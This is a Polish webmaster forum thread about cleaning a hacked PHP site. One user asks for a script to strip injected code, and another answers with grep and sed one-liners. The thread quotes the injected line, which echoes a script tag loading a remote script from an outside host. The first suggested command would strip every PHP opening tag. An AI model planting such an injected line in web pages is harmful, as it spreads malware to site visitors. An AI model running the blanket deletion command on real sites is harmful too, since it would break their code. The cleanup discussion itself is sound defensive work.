skrypt do usuwania włamu, skrypt który wyszuka pliki z określonym stringiem i go usunie Opcje

[maraska]

Witam,

Mam problem z bardzo rozległym włamem.
Podopisywało w plikach swoje własne <?php...".."...?> i robi brzydkie rzeczy.

Pytanie do koleżanek i kolegów, czy ma koś może gotowy skrypt shelowy , który wyszuka pliki zawierajace string w katalogu i podkatalogach i usunie ten string?

[Pyton_000]

jaki string

Coś w ten deseń:

Kod

grep -rl --colo=none '<?php' | sed -i -e 's/<?php//g'

Ale musisz przetestować i nie ręczę za rezultaty

Ten post edytował Pyton_000 27.02.2015, 08:56:50

[maraska]

Dziękuję za starania.

Cały string/wstrzyknięcie to 275 linii kodu.
Napisałem skrypt w php ale jakoś nie działa. Nie wiem czy przez to że muszę w stringu chaszować uszy.
Na szybko wystarczyłoby mi wycięcięcie tego:

[PHP] pobierz, plaintext 
echo \"<script type=\"text/javascript\" src=\"http://cvjm-wetzlar.de/whflfcrv.php?id=12827704\"></script>\";
[PHP] pobierz, plaintext 

Jak by wyglądał skrytp wycinający ten string we wszystkich plikach w lokalizacji np. /var/www/ ?
Czy wykonanie byłoby szybsze, gdyby najpierw wyszukał pliki z tym stringiem i tylko na nich by wycinał, bo podkatalogów i plików jest masa.

[Pyton_000]

To Ci usunie podany string w katalogu z krtórego odpalisz i podkatalogach

Kod

grep -rl --colo=none 'echo "<script type="text\/javascript" src="http:\/\/cvjm-wetzlar.de\/whflfcrv.php?id=12827704"><\/script>";' | xargs sed -i -e 's/echo "<script type="text\/javascript" src="http:\/\/cvjm-wetzlar.de\/whflfcrv.php?id=12827704"><\/script>";//g'